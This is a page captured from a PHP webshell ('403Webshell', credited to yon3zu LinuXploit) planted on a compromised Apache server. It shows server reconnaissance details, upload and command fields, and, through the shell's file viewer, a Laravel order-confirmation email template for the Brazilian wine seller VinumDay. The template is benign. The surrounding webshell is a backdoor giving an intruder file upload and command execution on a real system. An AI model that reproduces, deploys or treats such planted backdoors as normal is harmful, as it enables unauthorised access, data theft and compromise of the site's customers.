403Webshell
Server IP : 54.94.228.101  /  Your IP : 172.28.20.13
Web Server : Apache
System : Linux ip-172-28-29-189 6.5.0-1014-aws #14~22.04.1-Ubuntu SMP Thu Feb 15 15:27:06 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.2.34-43+ubuntu22.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/vinumday2_0/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/vinumday2_0/storage/framework/views/7cc2640ceb3477fce0f7f58e2b6bb4755c161f39.php
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type"/>
    <meta content="text/html"/>
    <meta charset="utf-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Pedido Recebido</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400;600;700&display=swap" rel="stylesheet">
</head>

<body style="margin: 0; padding: 0; color: #333866 !important;">
    <table style="width: 850px; margin:auto;">
        <tr>
            <td>
                <table style="width: 100%; height: 148px; background-color: #333866; color: white; border: 0;">
                    <tr>
                        <td width="530" style="border: 0; padding: 0px 61px 10px 63px">
                            <img src="https://i.imgur.com/TtqitWn.png" alt="VinumDay">
                        </td>
                        <td style="text-align: center; color:white;min-width: 350px;">
                            <span style="font-size: 16px; font-weight: bold; margin-bottom: 14px; display: block;">Pedido Recebido</span>
                            <span style="font-size: 14px; font-weight: normal;">N° do pedido: nº <?php echo e($pedidoVenda->id); ?></span>
                        </td>
                    </tr>
                </table>
                <table>
                    <tr>
                        <td>
                            <img src="https://i.imgur.com/uXpr7Hd.png" style="display:block; object-fit: contain; width: 100%;" alt="Logo" title="Logo" height="300" >
                        </td>
                    </tr>
                </table>
                <table style="width: 100%; padding: 0 58px;">
                    <tr>
                        <td>
                            <h2 style="color: #333866; font-size: 37px; font-weight: normal; display: block; text-align: center;">Olá <strong style="font-weight: bold; margin-bottom: 35px;"><?php echo e($pedidoVenda->cliente->nome); ?></strong>!</h2>
                        </td>
                    </tr>
                    <tr>
                        <td style="font-size: 16px;">
                            <p style="margin: 0px !important; color: #333866;"><strong style="font-weight: 600;">Pedido de compra</strong> registrado com sucesso!</p>
                            <p style="margin: 0px !important; color: #333866;">Seus produtos estão agora em sua <strong style="font-weight: 600;">Adega Virtual</strong> aguardando sua solicitação de entrega.</p>
                        </td>
                    </tr>

                    <tr>
                        <td style="font-size: 16px;">
                            <p style="margin: 0px !important; margin-top: 20px !important; color: #333866;"><strong style="font-weight: 600;">CONFIRA OS ITENS DO SEU PEDIDO:</strong></p>

                            <div class="items-pedido">
                                <?php $__currentLoopData = $ofertas; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $oferta): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <div class="item-pedido" style="display: flex; gap: 12px; background: #ededed; padding: 12px; margin-top: 10px;">
                                        <div class="item-imagem">
                                            <img src="<?php echo e($oferta->thumbnail_principal); ?>" style="display:block; object-fit: contain;" alt="Logo" title="Logo" width="100" height="100">
                                        </div>

                                        <div>
                                            <div style="padding-top: 5px;">
                                                <h5 style="font-weight: 600; font-size: 15px; margin: 0px;margin-top: 10px; color: #333866;"><?php echo e($oferta->titulo); ?></h5>
                                                <h5 style="margin: 0px;font-size: 15px; font-weight: 500; color: #333866;">Quantidade: <?php echo e(number_format($oferta->quantidade_no_pedido,0,'','')); ?></h5>
                                                <h5 style="margin: 0px;font-size: 15px; font-weight: 500; color: #333866;">Valor: R$ <?php echo e(number_format($oferta->preco_oferta * $oferta->quantidade_no_pedido,2,',','.')); ?></h5>
                                            </div>
                                        </div>
                                    </div>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </div>
                        </td>
                    </tr>

                    <tr>
                        <td style="font-size: 16px;">
                            <p style="margin: 0px !important; margin-top: 20px !important; margin-bottom: 10px !important; color: #333866;"><strong style="font-weight: 600;">OBSERVAÇÕES IMPORTANTES:</strong></p>
                            <p style="margin: 0px !important;">1) É necessário que você efetue a Solicitação de entrega no menu "Minha adega" em sua conta. Veja como funciona:</p>

                            <ul>
                                <li>Efetue o <a style="text-decoration: underline; color: #E15940;" href="https://vinumday.com.br/login">login</a> no site;</li>
                                <li>Na lateral esquerda selecione <a style="text-decoration: underline; color: #E15940;" href="https://www.vinumday.com.br/perfil/meus-vinhos">"Minha adega"</a>;</li>
                                <li>Selecione o endereço de preferência;</li>
                                <li>Selecione o botão "Solicitar entrega";</li>
                            </ul>

                            <p style="margin: 0px !important; margin-bottom: 10px !important;">Só assim você registra seu interesse no recebimento. Sugerimos que você fique atento aos valores de adega que habilitam benefícios de redução ou abono de frete;</p>
                            <p style="margin: 0px !important; margin-bottom: 10px !important;">2) Ao acumular os vinhos desejados na sua Adega Virtual ao Solicitar entrega você terá vantagens no frete podendo habilitar o serviço gratuito. Confira os valores de Adega que habilitam frete grátis para a sua região <a style="text-decoration: underline; color: #E15940;" href="https://vinumday.com.br/informacoes-entregas">aqui</a>;</p>
                            <p style="margin: 0px !important; margin-bottom: 10px !important;">3) Lembre-se de conferir seus dados e endereço de preferência. Divergências nos dados de entrega poderão resultar na cobrança de valores adicionais caso haja necessidade de alteração de endereço posterior ao envio.</p>
                        </td>
                    </tr>
                </table>
                <table style="width: 100%; margin-top: 40px;padding: 0 58px;">
                    <tr style="border-bottom: 1px solid #333866; border-top: 1px solid #EAECF0; display: block; padding: 48px 0;">
                        <td style="font-size: 16px; line-height: 20px;">
                            <p style="margin-bottom: 40px; color: #333866;"><strong style="font-weight: 600; ">Ficou alguma dúvida?</strong> Envie um e-mail para <a style="text-decoration: underline; color: #E15940;" href="mailto:contato@vinumday.com.br">contato@vinumday.com.br</a></p>

                            <p>Agradecemos muito por comprar conosco.</p>
                            <strong style="font-weight: 600;">Um abraço da equipe VinumDay :)</strong>
                        </td>
                    </tr>
                </table>
                <table style="width: 100%; padding: 48px 0; text-align: center;">
                    <tr>
                        <td>
                            <strong style="font-size: 16px; font-weight: 600; margin-bottom: 15px; margin-top: 15px;display: block;">Siga-nos em nossas redes para acompanhar novas ofertas:</strong>
                        </td>
                    </tr>
                    <tr>
                        <td style="padding-top: 38px;">
                            <a style="margin: 0 25px;text-decoration: none;" href="https://www.facebook.com/vinumday" title="Facebook">
                                <img src="https://i.imgur.com/cTciwxq.png" alt="Facebook">
                            </a>
                            <a style="margin: 0 25px;text-decoration: none;" href="https://www.youtube.com/channel/UCsPe_Qn0fEYEDPnZwD1-cgg" title="Youtube">
                                <img src="https://i.imgur.com/efLr19t.png" alt="Youtube">
                            </a>
                            <a style="margin: 0 25px;text-decoration: none;" href="https://www.instagram.com/vinumday/" title="Instagram">
                                <img src="https://i.imgur.com/Y0342Gh.png" alt="Instagram">
                            </a>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
    </table>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit